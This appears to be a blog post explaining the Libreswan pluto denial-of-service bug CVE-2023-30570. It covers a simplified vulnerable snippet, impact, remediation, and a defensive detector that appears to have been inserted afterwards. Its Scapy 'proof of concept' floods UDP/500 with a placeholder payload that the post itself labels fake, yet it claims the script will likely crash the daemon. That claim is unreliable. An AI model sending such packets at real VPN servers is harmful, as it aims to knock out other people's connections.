Libreswan is one of the most popular open source implementations of IPsec and IKE protocols used for virtual private networks (VPNs) on Linux. If you use VPNs, you may well be depending on Libreswan—even indirectly—due to its inclusion in many distributions. In 2023, researchers discovered a significant vulnerability (CVE-2023-30570) in the core of Libreswan, called "pluto", which could lead to denial of service and a crash of the VPN daemon itself.

In this post, I’ll break down what went wrong, explain how the exploit works, include code snippets that highlight the vulnerable logic, and even show how an attacker could trigger this bug. The aim here is to make it straightforward, even if you’re not a deep protocol expert.

What is CVE-2023-30570?

CVE-2023-30570 is a vulnerability in Libreswan’s pluto daemon, present in all versions from 3.28 up to (but not including) 4.11. The bug can be exploited using IKEv1 Aggressive Mode packets, and—worse—no authentication is required.

In simple terms: An attacker can send specially crafted IKEv1 packets over the network, and that alone is enough to crash the whole pluto process, likely killing all VPN connections the server is hosting. That’s a textbook Denial of Service (DoS) attack.

How Does The Exploit Work?

The IKE (Internet Key Exchange) protocol is how VPN endpoints negotiate secure connections. Aggressive Mode (now generally discouraged in favor of Main Mode) completes the exchange in fewer round trips but offers weaker protection. Pluto maintains "SPI" (Security Parameters Index) values to keep track of requests and responses.

The bug in Libreswan’s pluto arises during the handling of IKEv1 Aggressive Mode packets, when pluto mishandles its responder SPI values. An attacker abuses this by sending a series of unauthenticated packets that confuse pluto about its SPIs; pluto then dereferences a wrong or NULL pointer and crashes.

Here’s a simplified version:

1. Attacker sends malicious packets: Repeated unauthenticated Aggressive Mode packets are sent with carefully chosen SPI values.
2. Pluto mishandles SPI state: Due to a missing check in the pluto code, the daemon references freed or invalid memory.

Code Snippet: The Vulnerable Code

This snippet is simplified to show where things go wrong (from pluto’s packet handling in IKEv1 Aggressive Mode):

```c
// In IKEv1 Aggressive Mode packet handling
struct state *st = find_state_by_responder_spi(receiver_spi);
if (st == NULL) {
    // Normally, this would be a benign scenario.
    // But due to mishandling, later code assumes st is valid!
}

...

// Later in the same function, accesses 'st' blindly
send_notification(st, ...);  // Oops, st may be NULL!
```

If st is NULL (not found), but code continues to use it as though it’s valid, the process can crash.

Proof-of-Concept Exploit (PoC)

Though we won’t give a full attack toolkit, here’s a simple Python script leveraging Scapy to demonstrate how an attacker could send malformed IKEv1 Aggressive Mode packets to a Libreswan VPN server:

```python
from scapy.all import *

# Set target IP and port
target = "vpn.example.com"
port = 500  # IKE uses UDP 500

# Construct IKEv1 Aggressive Mode packet with arbitrary SPI
ikev1_packet = (IP(dst=target)/UDP(dport=port)/Raw(
    # This payload would normally be crafted according to IKEv1's format,
    # with an aggressive mode SPI that triggers the bug
    b"\x01\x10" + b"\x00" * 26  # (fake header+body for demonstration)
))

# Send packets in a loop, as the bug may require repeated triggers
for i in range(20):
    send(ikev1_packet, verbose=0)  # verbose=0 suppresses Scapy's per-packet output
    print(f"Sent packet {i+1}")
```

This won’t work against fixed versions (4.11 and later), but will likely crash pluto on vulnerable instances.

Impact

- Remote Denial of Service: Any attacker on the internet can crash your VPN.
- No Authentication Required: It’s a *pre-auth* attack, so even unregistered users can take down your service.
- Wide Reach: Any Linux/BSD box running Libreswan 3.28 to 4.10 is vulnerable by default if IKEv1 is enabled.

Remediation

Simple: upgrade to Libreswan 4.11 or later.

Alternatively, turn off IKEv1 support. In /etc/ipsec.conf add

ikev1=never

and then reload/restart the service.
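As an added example (not code from this post or from Libreswan), here is a small Python detector that parses the 28-byte ISAKMP header (RFC 2408) of UDP/500 traffic and reports sources that repeatedly send IKEv1 Aggressive Mode packets naming a non-zero responder SPI this gateway never issued, which is the "state not found" condition the bug above depends on. The sample packets, addresses and the `KNOWN_RSPIS` set are constructed, and `flag_aggressive_sources` and `build_hdr` are hypothetical names.

```python
import struct
from collections import Counter

# ISAKMP header (RFC 2408, 28 bytes): initiator SPI, responder SPI, next payload,
# version (major nibble, minor nibble), exchange type, flags, message ID, length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
AGGRESSIVE = 4          # IKEv1 exchange type for Aggressive Mode
ZERO_SPI = b"\x00" * 8  # responder SPI in a legitimate first message

def parse_isakmp(data):
    """Return the header fields of one IKE datagram, or None if it is too short."""
    if len(data) < ISAKMP_HDR.size:
        return None
    ispi, rspi, _nxt, ver, exch, _flags, _msgid, length = ISAKMP_HDR.unpack_from(data)
    return {"ispi": ispi, "rspi": rspi, "major": ver >> 4, "exch": exch, "len": length}

def flag_aggressive_sources(packets, known_rspis, threshold=5):
    """packets: iterable of (src_ip, udp_payload). known_rspis: responder SPIs this
    gateway actually issued (hypothetically exported from the daemon's state table).
    Returns {src_ip: count} for sources that sent at least `threshold` IKEv1
    Aggressive Mode packets naming a non-zero responder SPI we never issued,
    i.e. packets that exercise the 'state not found' path this CVE is about."""
    hits = Counter()
    for src, data in packets:
        hdr = parse_isakmp(data)
        if hdr is None or hdr["major"] != 1 or hdr["exch"] != AGGRESSIVE:
            continue  # IKEv2, Main Mode, Quick Mode, Informational, or truncated
        if hdr["rspi"] != ZERO_SPI and hdr["rspi"] not in known_rspis:
            hits[src] += 1
    return {src: n for src, n in hits.items() if n >= threshold}

def build_hdr(ispi, rspi, exch, version=0x10):
    """Constructed header-only datagram (length field = 28, no payloads)."""
    return ISAKMP_HDR.pack(ispi, rspi, 1, version, exch, 0, 0, ISAKMP_HDR.size)

# Constructed sample traffic (all addresses are from documentation ranges).
KNOWN_RSPIS = {b"R" * 8}
SAMPLE_PACKETS = (
    [("203.0.113.5", build_hdr(b"A" * 8, ZERO_SPI, 2))]                 # Main Mode, first message
    + [("203.0.113.5", build_hdr(b"A" * 8, b"R" * 8, AGGRESSIVE))]      # continues a real SA
    + [("192.0.2.7", build_hdr(b"C" * 8, ZERO_SPI, 34, version=0x20))]  # IKEv2 IKE_SA_INIT
    + [("198.51.100.9", build_hdr(b"B" * 8, b"\xde\xad\xbe\xef" * 2, AGGRESSIVE))] * 6
    + [("198.51.100.9", b"\x01\x10")]                                   # truncated, ignored
)

if __name__ == "__main__":
    print(flag_aggressive_sources(SAMPLE_PACKETS, KNOWN_RSPIS))
```

In practice you would feed it payloads captured from the gateway's UDP/500 socket and the SPIs of established SAs; a source that trips the threshold is worth blocking at the firewall while the upgrade is scheduled.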

More Information & References

- Libreswan CVE-2023-30570 Security Advisory (official)
- NVD Entry for CVE-2023-30570
- Mitre CVE Details

Conclusion

CVE-2023-30570 is a critical issue in Libreswan’s pluto handling of IKEv1 Aggressive Mode, letting anyone on the network bring down your VPN server with ease. The only defense is to update your software—now—or turn off IKEv1 support altogether. As always, keep those VPN endpoints patched, and avoid insecure protocol modes like Aggressive wherever possible.

If you found this useful, consider checking your infrastructure for old VPN stacks—the internet never sleeps, and neither do attackers!

Timeline

Published on: 05/29/2023 00:15:00 UTC
Last modified on: 06/03/2023 04:12:00 UTC